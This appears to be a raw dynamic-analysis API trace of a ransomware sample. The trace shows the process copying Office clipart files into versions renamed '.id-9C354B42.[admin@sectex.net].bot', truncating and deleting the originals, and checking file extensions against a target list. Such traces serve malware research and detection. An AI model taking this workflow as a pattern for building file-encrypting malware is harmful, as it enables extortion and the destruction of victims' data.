	[0151.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0151.049] GetLastError () returned 0x0
	[0151.049] ReadFile (in: hFile=0x1b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x11dfe, lpOverlapped=0x0) returned 1
	[0151.058] WriteFile (in: hFile=0x3c8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x11e00, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x11e00, lpOverlapped=0x0) returned 1
	[0151.060] ReadFile (in: hFile=0x1b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.060] WriteFile (in: hFile=0x3c8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.060] SetEndOfFile (hFile=0x3c8) returned 1
	[0151.060] CloseHandle (hObject=0x3c8) returned 1
	[0151.060] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.060] SetEndOfFile (hFile=0x1b8) returned 1
	[0151.063] CloseHandle (hObject=0x1b8) returned 1
	[0151.063] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0151.064] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf")) returned 1
	[0151.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.064] lstrlenW (lpString=".doc") returned 4
	[0151.064] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0151.064] lstrlenW (lpString=".docx") returned 5
	[0151.064] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0151.064] lstrlenW (lpString=".pdf") returned 4
	[0151.064] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0151.064] lstrlenW (lpString=".xls") returned 4
	[0151.064] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0151.065] lstrlenW (lpString=".xlsx") returned 5
	[0151.065] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0151.065] lstrlenW (lpString=".ppt") returned 4
	[0151.065] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0151.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.065] lstrlenW (lpString=".zip") returned 4
	[0151.065] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0151.065] lstrlenW (lpString=".rar") returned 4
	[0151.065] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0151.065] lstrlenW (lpString=".bz2") returned 4
	[0151.065] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0151.065] lstrlenW (lpString=".7z") returned 3
	[0151.065] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0151.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.065] lstrlenW (lpString=".dbf") returned 4
	[0151.065] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0151.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.065] lstrlenW (lpString=".1cd") returned 4
	[0151.065] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0151.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.065] lstrlenW (lpString=".jpg") returned 4
	[0151.065] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0151.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.065] lstrlenW (lpString=".doc") returned 4
	[0151.065] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0151.065] lstrlenW (lpString=".docx") returned 5
	[0151.065] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0151.065] lstrlenW (lpString=".pdf") returned 4
	[0151.065] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0151.066] lstrlenW (lpString=".xls") returned 4
	[0151.066] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0151.066] lstrlenW (lpString=".xlsx") returned 5
	[0151.066] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0151.066] lstrlenW (lpString=".ppt") returned 4
	[0151.066] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0151.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.066] lstrlenW (lpString=".zip") returned 4
	[0151.066] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0151.066] lstrlenW (lpString=".rar") returned 4
	[0151.066] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0151.066] lstrlenW (lpString=".bz2") returned 4
	[0151.066] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0151.066] lstrlenW (lpString=".7z") returned 3
	[0151.066] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0151.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.066] lstrlenW (lpString=".dbf") returned 4
	[0151.066] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0151.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.066] lstrlenW (lpString=".1cd") returned 4
	[0151.066] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0151.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63
	[0151.066] lstrlenW (lpString=".jpg") returned 4
	[0151.066] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0151.066] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0151.066] lstrlenW (lpString="J0099157.JPG") returned 12
	[0151.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0151.067] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=9671) returned 1
	[0151.067] CloseHandle (hObject=0x1b8) returned 1
	[0151.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg")) returned 0x20
	[0151.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0151.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0151.067] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.067] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0151.070] GetLastError () returned 0x0
	[0151.070] ReadFile (in: hFile=0x1b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x25c7, lpOverlapped=0x0) returned 1
	[0151.945] WriteFile (in: hFile=0x3c8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x25d0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x25d0, lpOverlapped=0x0) returned 1
	[0151.946] ReadFile (in: hFile=0x1b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.946] WriteFile (in: hFile=0x3c8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.946] SetEndOfFile (hFile=0x3c8) returned 1
	[0151.946] CloseHandle (hObject=0x3c8) returned 1
	[0151.947] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.947] SetEndOfFile (hFile=0x1b8) returned 1
	[0151.949] CloseHandle (hObject=0x1b8) returned 1
	[0151.949] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.442] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg")) returned 1
	[0152.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.443] lstrlenW (lpString=".doc") returned 4
	[0152.443] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.443] lstrlenW (lpString=".docx") returned 5
	[0152.443] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0152.443] lstrlenW (lpString=".pdf") returned 4
	[0152.443] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.443] lstrlenW (lpString=".xls") returned 4
	[0152.443] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.443] lstrlenW (lpString=".xlsx") returned 5
	[0152.443] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0152.443] lstrlenW (lpString=".ppt") returned 4
	[0152.443] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.443] lstrlenW (lpString=".zip") returned 4
	[0152.443] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.443] lstrlenW (lpString=".rar") returned 4
	[0152.444] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.444] lstrlenW (lpString=".bz2") returned 4
	[0152.444] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.444] lstrlenW (lpString=".7z") returned 3
	[0152.444] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.444] lstrlenW (lpString=".dbf") returned 4
	[0152.444] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.444] lstrlenW (lpString=".1cd") returned 4
	[0152.444] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.444] lstrlenW (lpString=".jpg") returned 4
	[0152.444] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.444] lstrlenW (lpString=".doc") returned 4
	[0152.444] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.444] lstrlenW (lpString=".docx") returned 5
	[0152.444] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0152.444] lstrlenW (lpString=".pdf") returned 4
	[0152.444] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.444] lstrlenW (lpString=".xls") returned 4
	[0152.444] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.444] lstrlenW (lpString=".xlsx") returned 5
	[0152.444] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0152.444] lstrlenW (lpString=".ppt") returned 4
	[0152.444] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.444] lstrlenW (lpString=".zip") returned 4
	[0152.445] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.445] lstrlenW (lpString=".rar") returned 4
	[0152.445] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.445] lstrlenW (lpString=".bz2") returned 4
	[0152.445] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.445] lstrlenW (lpString=".7z") returned 3
	[0152.445] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.445] lstrlenW (lpString=".dbf") returned 4
	[0152.445] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.445] lstrlenW (lpString=".1cd") returned 4
	[0152.445] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 63
	[0152.445] lstrlenW (lpString=".jpg") returned 4
	[0152.445] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.445] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0152.445] lstrlenW (lpString="J0099162.JPG") returned 12
	[0152.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0152.446] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=19656) returned 1
	[0152.446] CloseHandle (hObject=0x38c) returned 1
	[0152.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg")) returned 0x20
	[0152.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0152.446] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.446] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.447] GetLastError () returned 0x0
	[0152.447] ReadFile (in: hFile=0x38c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4cc8, lpOverlapped=0x0) returned 1
	[0152.472] WriteFile (in: hFile=0x3f8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4cd0, lpOverlapped=0x0) returned 1
	[0152.473] ReadFile (in: hFile=0x38c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.473] WriteFile (in: hFile=0x3f8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.473] SetEndOfFile (hFile=0x3f8) returned 1
	[0152.473] CloseHandle (hObject=0x3f8) returned 1
	[0152.473] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.473] SetEndOfFile (hFile=0x38c) returned 1
	[0152.475] CloseHandle (hObject=0x38c) returned 1
	[0152.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.476] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg")) returned 1
	[0152.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.476] lstrlenW (lpString=".doc") returned 4
	[0152.476] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.476] lstrlenW (lpString=".docx") returned 5
	[0152.476] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0152.477] lstrlenW (lpString=".pdf") returned 4
	[0152.477] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.477] lstrlenW (lpString=".xls") returned 4
	[0152.477] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.477] lstrlenW (lpString=".xlsx") returned 5
	[0152.477] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0152.477] lstrlenW (lpString=".ppt") returned 4
	[0152.477] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.477] lstrlenW (lpString=".zip") returned 4
	[0152.477] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.477] lstrlenW (lpString=".rar") returned 4
	[0152.477] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.477] lstrlenW (lpString=".bz2") returned 4
	[0152.477] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.477] lstrlenW (lpString=".7z") returned 3
	[0152.477] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.477] lstrlenW (lpString=".dbf") returned 4
	[0152.477] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.477] lstrlenW (lpString=".1cd") returned 4
	[0152.477] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.477] lstrlenW (lpString=".jpg") returned 4
	[0152.477] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.477] lstrlenW (lpString=".doc") returned 4
	[0152.478] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.478] lstrlenW (lpString=".docx") returned 5
	[0152.478] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0152.478] lstrlenW (lpString=".pdf") returned 4
	[0152.478] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.478] lstrlenW (lpString=".xls") returned 4
	[0152.478] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.478] lstrlenW (lpString=".xlsx") returned 5
	[0152.478] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0152.478] lstrlenW (lpString=".ppt") returned 4
	[0152.478] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.478] lstrlenW (lpString=".zip") returned 4
	[0152.478] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.478] lstrlenW (lpString=".rar") returned 4
	[0152.478] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.478] lstrlenW (lpString=".bz2") returned 4
	[0152.478] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.478] lstrlenW (lpString=".7z") returned 3
	[0152.478] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.478] lstrlenW (lpString=".dbf") returned 4
	[0152.478] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.478] lstrlenW (lpString=".1cd") returned 4
	[0152.478] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63
	[0152.478] lstrlenW (lpString=".jpg") returned 4
	[0152.478] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.479] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0152.479] lstrlenW (lpString="J0099165.JPG") returned 12
	[0152.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0152.493] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=50490) returned 1
	[0152.493] CloseHandle (hObject=0x3fc) returned 1
	[0152.493] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg")) returned 0x20
	[0152.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.501] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.501] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
